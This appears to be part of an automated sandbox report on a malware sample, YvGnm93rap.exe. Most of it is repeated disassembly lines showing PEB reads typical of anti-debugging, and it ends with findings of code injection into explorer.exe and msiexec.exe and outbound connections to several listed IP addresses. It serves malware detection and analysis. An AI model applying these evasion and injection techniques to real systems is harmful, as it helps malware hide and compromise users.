Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]	2_2_00F1A309
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]	2_2_00F1A309
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1A309 mov eax, dword ptr fs:[00000030h]	2_2_00F1A309
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB14FB mov eax, dword ptr fs:[00000030h]	2_2_00FB14FB
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F76CF0 mov eax, dword ptr fs:[00000030h]	2_2_00F76CF0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F76CF0 mov eax, dword ptr fs:[00000030h]	2_2_00F76CF0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F76CF0 mov eax, dword ptr fs:[00000030h]	2_2_00F76CF0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC8CD6 mov eax, dword ptr fs:[00000030h]	2_2_00FC8CD6
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F0849B mov eax, dword ptr fs:[00000030h]	2_2_00F0849B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]	2_2_00FB4496
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]	2_2_00FB4496
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]	2_2_00FB4496
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]	2_2_00FB4496
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]	2_2_00FB4496
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]	2_2_00FB4496
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]	2_2_00FB4496
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]	2_2_00FB4496
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]	2_2_00FB4496
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]	2_2_00FB4496
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]	2_2_00FB4496
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]	2_2_00FB4496
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB4496 mov eax, dword ptr fs:[00000030h]	2_2_00FB4496
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]	2_2_00F1B477
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]	2_2_00F1B477
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]	2_2_00F1B477
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]	2_2_00F1B477
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]	2_2_00F1B477
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]	2_2_00F1B477
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]	2_2_00F1B477
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]	2_2_00F1B477
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]	2_2_00F1B477
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]	2_2_00F1B477
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]	2_2_00F1B477
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B477 mov eax, dword ptr fs:[00000030h]	2_2_00F1B477
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]	2_2_00F2AC7B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]	2_2_00F2AC7B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]	2_2_00F2AC7B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]	2_2_00F2AC7B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]	2_2_00F2AC7B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]	2_2_00F2AC7B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]	2_2_00F2AC7B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]	2_2_00F2AC7B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]	2_2_00F2AC7B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]	2_2_00F2AC7B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2AC7B mov eax, dword ptr fs:[00000030h]	2_2_00F2AC7B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1746D mov eax, dword ptr fs:[00000030h]	2_2_00F1746D
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F8C450 mov eax, dword ptr fs:[00000030h]	2_2_00F8C450
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F8C450 mov eax, dword ptr fs:[00000030h]	2_2_00F8C450
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2A44B mov eax, dword ptr fs:[00000030h]	2_2_00F2A44B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2BC2C mov eax, dword ptr fs:[00000030h]	2_2_00F2BC2C
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC740D mov eax, dword ptr fs:[00000030h]	2_2_00FC740D
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC740D mov eax, dword ptr fs:[00000030h]	2_2_00FC740D
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC740D mov eax, dword ptr fs:[00000030h]	2_2_00FC740D
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]	2_2_00FB1C06
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]	2_2_00FB1C06
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]	2_2_00FB1C06
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]	2_2_00FB1C06
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]	2_2_00FB1C06
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]	2_2_00FB1C06
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]	2_2_00FB1C06
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]	2_2_00FB1C06
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]	2_2_00FB1C06
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]	2_2_00FB1C06
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]	2_2_00FB1C06
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]	2_2_00FB1C06
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]	2_2_00FB1C06
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB1C06 mov eax, dword ptr fs:[00000030h]	2_2_00FB1C06
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F76C0A mov eax, dword ptr fs:[00000030h]	2_2_00F76C0A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F76C0A mov eax, dword ptr fs:[00000030h]	2_2_00F76C0A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F76C0A mov eax, dword ptr fs:[00000030h]	2_2_00F76C0A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F76C0A mov eax, dword ptr fs:[00000030h]	2_2_00F76C0A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FA8DF1 mov eax, dword ptr fs:[00000030h]	2_2_00FA8DF1
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F0D5E0 mov eax, dword ptr fs:[00000030h]	2_2_00F0D5E0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F0D5E0 mov eax, dword ptr fs:[00000030h]	2_2_00F0D5E0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FBFDE2 mov eax, dword ptr fs:[00000030h]	2_2_00FBFDE2
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FBFDE2 mov eax, dword ptr fs:[00000030h]	2_2_00FBFDE2
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FBFDE2 mov eax, dword ptr fs:[00000030h]	2_2_00FBFDE2
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FBFDE2 mov eax, dword ptr fs:[00000030h]	2_2_00FBFDE2
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F76DC9 mov eax, dword ptr fs:[00000030h]	2_2_00F76DC9
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F76DC9 mov eax, dword ptr fs:[00000030h]	2_2_00F76DC9
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F76DC9 mov eax, dword ptr fs:[00000030h]	2_2_00F76DC9
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F76DC9 mov ecx, dword ptr fs:[00000030h]	2_2_00F76DC9
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F76DC9 mov eax, dword ptr fs:[00000030h]	2_2_00F76DC9
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F76DC9 mov eax, dword ptr fs:[00000030h]	2_2_00F76DC9
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F21DB5 mov eax, dword ptr fs:[00000030h]	2_2_00F21DB5
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F21DB5 mov eax, dword ptr fs:[00000030h]	2_2_00F21DB5
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F21DB5 mov eax, dword ptr fs:[00000030h]	2_2_00F21DB5
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC05AC mov eax, dword ptr fs:[00000030h]	2_2_00FC05AC
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC05AC mov eax, dword ptr fs:[00000030h]	2_2_00FC05AC
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F235A1 mov eax, dword ptr fs:[00000030h]	2_2_00F235A1
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF2D8A mov eax, dword ptr fs:[00000030h]	2_2_00EF2D8A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF2D8A mov eax, dword ptr fs:[00000030h]	2_2_00EF2D8A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF2D8A mov eax, dword ptr fs:[00000030h]	2_2_00EF2D8A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF2D8A mov eax, dword ptr fs:[00000030h]	2_2_00EF2D8A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF2D8A mov eax, dword ptr fs:[00000030h]	2_2_00EF2D8A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2FD9B mov eax, dword ptr fs:[00000030h]	2_2_00F2FD9B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2FD9B mov eax, dword ptr fs:[00000030h]	2_2_00F2FD9B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F22581 mov eax, dword ptr fs:[00000030h]	2_2_00F22581
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F22581 mov eax, dword ptr fs:[00000030h]	2_2_00F22581
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F22581 mov eax, dword ptr fs:[00000030h]	2_2_00F22581
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F22581 mov eax, dword ptr fs:[00000030h]	2_2_00F22581
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB2D82 mov eax, dword ptr fs:[00000030h]	2_2_00FB2D82
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB2D82 mov eax, dword ptr fs:[00000030h]	2_2_00FB2D82
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB2D82 mov eax, dword ptr fs:[00000030h]	2_2_00FB2D82
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB2D82 mov eax, dword ptr fs:[00000030h]	2_2_00FB2D82
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB2D82 mov eax, dword ptr fs:[00000030h]	2_2_00FB2D82
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB2D82 mov eax, dword ptr fs:[00000030h]	2_2_00FB2D82
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB2D82 mov eax, dword ptr fs:[00000030h]	2_2_00FB2D82
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1C577 mov eax, dword ptr fs:[00000030h]	2_2_00F1C577
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1C577 mov eax, dword ptr fs:[00000030h]	2_2_00F1C577
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F17D50 mov eax, dword ptr fs:[00000030h]	2_2_00F17D50
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F33D43 mov eax, dword ptr fs:[00000030h]	2_2_00F33D43
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F73540 mov eax, dword ptr fs:[00000030h]	2_2_00F73540
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FA3D40 mov eax, dword ptr fs:[00000030h]	2_2_00FA3D40
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F7A537 mov eax, dword ptr fs:[00000030h]	2_2_00F7A537
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FBE539 mov eax, dword ptr fs:[00000030h]	2_2_00FBE539
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]	2_2_00F03D34
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]	2_2_00F03D34
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]	2_2_00F03D34
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]	2_2_00F03D34
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]	2_2_00F03D34
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]	2_2_00F03D34
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]	2_2_00F03D34
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]	2_2_00F03D34
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]	2_2_00F03D34
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]	2_2_00F03D34
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]	2_2_00F03D34
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]	2_2_00F03D34
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F03D34 mov eax, dword ptr fs:[00000030h]	2_2_00F03D34
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC8D34 mov eax, dword ptr fs:[00000030h]	2_2_00FC8D34
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F24D3B mov eax, dword ptr fs:[00000030h]	2_2_00F24D3B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F24D3B mov eax, dword ptr fs:[00000030h]	2_2_00F24D3B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F24D3B mov eax, dword ptr fs:[00000030h]	2_2_00F24D3B
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2F527 mov eax, dword ptr fs:[00000030h]	2_2_00F2F527
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2F527 mov eax, dword ptr fs:[00000030h]	2_2_00F2F527
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2F527 mov eax, dword ptr fs:[00000030h]	2_2_00F2F527
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EFAD30 mov eax, dword ptr fs:[00000030h]	2_2_00EFAD30
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F216E0 mov ecx, dword ptr fs:[00000030h]	2_2_00F216E0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F076E2 mov eax, dword ptr fs:[00000030h]	2_2_00F076E2
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC8ED6 mov eax, dword ptr fs:[00000030h]	2_2_00FC8ED6
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F38EC7 mov eax, dword ptr fs:[00000030h]	2_2_00F38EC7
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FAFEC0 mov eax, dword ptr fs:[00000030h]	2_2_00FAFEC0
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F236CC mov eax, dword ptr fs:[00000030h]	2_2_00F236CC
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F746A7 mov eax, dword ptr fs:[00000030h]	2_2_00F746A7
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC0EA5 mov eax, dword ptr fs:[00000030h]	2_2_00FC0EA5
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC0EA5 mov eax, dword ptr fs:[00000030h]	2_2_00FC0EA5
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC0EA5 mov eax, dword ptr fs:[00000030h]	2_2_00FC0EA5
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F8FE87 mov eax, dword ptr fs:[00000030h]	2_2_00F8FE87
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1AE73 mov eax, dword ptr fs:[00000030h]	2_2_00F1AE73
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1AE73 mov eax, dword ptr fs:[00000030h]	2_2_00F1AE73
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1AE73 mov eax, dword ptr fs:[00000030h]	2_2_00F1AE73
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1AE73 mov eax, dword ptr fs:[00000030h]	2_2_00F1AE73
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1AE73 mov eax, dword ptr fs:[00000030h]	2_2_00F1AE73
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F0766D mov eax, dword ptr fs:[00000030h]	2_2_00F0766D
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F07E41 mov eax, dword ptr fs:[00000030h]	2_2_00F07E41
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F07E41 mov eax, dword ptr fs:[00000030h]	2_2_00F07E41
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F07E41 mov eax, dword ptr fs:[00000030h]	2_2_00F07E41
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F07E41 mov eax, dword ptr fs:[00000030h]	2_2_00F07E41
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F07E41 mov eax, dword ptr fs:[00000030h]	2_2_00F07E41
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F07E41 mov eax, dword ptr fs:[00000030h]	2_2_00F07E41
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FBAE44 mov eax, dword ptr fs:[00000030h]	2_2_00FBAE44
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FBAE44 mov eax, dword ptr fs:[00000030h]	2_2_00FBAE44
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FAFE3F mov eax, dword ptr fs:[00000030h]	2_2_00FAFE3F
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EFE620 mov eax, dword ptr fs:[00000030h]	2_2_00EFE620
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2A61C mov eax, dword ptr fs:[00000030h]	2_2_00F2A61C
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2A61C mov eax, dword ptr fs:[00000030h]	2_2_00F2A61C
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EFC600 mov eax, dword ptr fs:[00000030h]	2_2_00EFC600
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EFC600 mov eax, dword ptr fs:[00000030h]	2_2_00EFC600
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EFC600 mov eax, dword ptr fs:[00000030h]	2_2_00EFC600
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F28E00 mov eax, dword ptr fs:[00000030h]	2_2_00F28E00
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FB1608 mov eax, dword ptr fs:[00000030h]	2_2_00FB1608
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F337F5 mov eax, dword ptr fs:[00000030h]	2_2_00F337F5
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F77794 mov eax, dword ptr fs:[00000030h]	2_2_00F77794
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F77794 mov eax, dword ptr fs:[00000030h]	2_2_00F77794
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F77794 mov eax, dword ptr fs:[00000030h]	2_2_00F77794
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F08794 mov eax, dword ptr fs:[00000030h]	2_2_00F08794
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F0FF60 mov eax, dword ptr fs:[00000030h]	2_2_00F0FF60
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC8F6A mov eax, dword ptr fs:[00000030h]	2_2_00FC8F6A
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F0EF40 mov eax, dword ptr fs:[00000030h]	2_2_00F0EF40
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF4F2E mov eax, dword ptr fs:[00000030h]	2_2_00EF4F2E
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00EF4F2E mov eax, dword ptr fs:[00000030h]	2_2_00EF4F2E
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F23F33 mov eax, dword ptr fs:[00000030h]	2_2_00F23F33
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2E730 mov eax, dword ptr fs:[00000030h]	2_2_00F2E730
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B73D mov eax, dword ptr fs:[00000030h]	2_2_00F1B73D
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1B73D mov eax, dword ptr fs:[00000030h]	2_2_00F1B73D
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F24710 mov eax, dword ptr fs:[00000030h]	2_2_00F24710
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F1F716 mov eax, dword ptr fs:[00000030h]	2_2_00F1F716
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F8FF10 mov eax, dword ptr fs:[00000030h]	2_2_00F8FF10
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F8FF10 mov eax, dword ptr fs:[00000030h]	2_2_00F8FF10
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC070D mov eax, dword ptr fs:[00000030h]	2_2_00FC070D
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00FC070D mov eax, dword ptr fs:[00000030h]	2_2_00FC070D
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2A70E mov eax, dword ptr fs:[00000030h]	2_2_00F2A70E
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Code function: 2_2_00F2A70E mov eax, dword ptr fs:[00000030h]	2_2_00F2A70E

Source: C:\Users\user\Desktop\YvGnm93rap.exe	Process token adjusted: Debug			Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process token adjusted: Debug			Jump to behavior

Source: C:\Users\user\Desktop\YvGnm93rap.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)

Show sources

Source: C:\Windows\explorer.exe	Network Connect: 104.233.238.207 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 195.78.66.137 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 184.168.131.241 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 37.48.65.150 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 34.102.136.180 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 135.181.31.212 80	Jump to behavior
Source: C:\Windows\explorer.exe	Network Connect: 54.208.77.124 80	Jump to behavior

Maps a DLL or memory area into another process

Show sources

Source: C:\Users\user\Desktop\YvGnm93rap.exe	Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Users\user\Desktop\YvGnm93rap.exe	Section loaded: unknown target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write	Jump to behavior
